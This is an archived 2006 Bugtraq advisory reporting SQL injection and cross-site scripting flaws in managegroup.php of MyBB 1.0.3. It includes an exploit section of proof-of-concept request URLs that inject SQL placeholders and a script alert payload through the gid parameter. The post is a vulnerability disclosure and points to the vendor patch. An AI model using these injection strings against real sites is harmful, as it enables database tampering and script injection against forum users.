lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 15 Feb 2006 19:03:12 -0000 From: addmimistrator@...il.com To: bugtraq@...urityfocus.com Subject: [myimei]MyBB1.0.3~managegroup.php~Multiple SqlInjection & XSS \>>>>>>>>ORIGINAL ADVISORY<<<<<<<<<<</ http://myimei.com/security/2006-02-10/mybb103managegroupphpmultiple-sqlinjection-xss.html Vendor Credit:http://community.mybboard.net/showthread.php?tid=6777 ——————-Summary—————- Software: MyBB Sowtware’s Web Site: http://www.mybboard.com Versions: 1.0.3 Class: Remote Status: Unpatched Exploit: Available Solution: Available Discovered by: <strong>imei addmimistrator</strong> Risk Level: <strong>mediume high</strong> —————–Description————— There is some security bug in MyBB 1.0.3 software (latest version fully patched) file <strong>managegroup.php </strong> lines 313 that allows attacker performe an <strong>SQLINJECTION </strong>and<strong> XSS</strong> attack.<!--more--> bug is in result of poor checking non integer values for <strong>“gid” </strong>input variable. Conditions: user should have enough permissions (group leader) ///////////////////////// Lines of buggy code are: 75 sql 98 sql 125 sql 141 sql 160 sql 177 xss ///////////////////////// ————–Exploit———————- mybb/managegroup.php?gid=8&action=do_joinrequests&request[<strong>sql</strong>]=accept mybb/managegroup.php?gid=8'<strong>sql</strong>&action=joinrequests mybb/managegroup.php?gid=8'<strong>sql</strong>&action=do_manageusers&removeuser[]='<strong>sql</strong> mybb/managegroup.php?gid=8'<strong>sql</strong>{if user group is publically joinabe with moderated by leader} mybb/managegroup.php?gid=8'<strong>sql</strong>{if user group is publically joinabe without moderating by leader} mybb/managegroup.php?gid=8'//<script>alert(1)</script>{if user group is publically joinabe without moderating by leader also requests are as more as can not show on one page} ————–Solution——————— upgrade to vendors provided patch ————–Credit———————– Discovered by: imei addmimistrator addmimistrator(4}gmail(O}com www.myimei.com security.myimei.com
Powered by blists - more mailing lists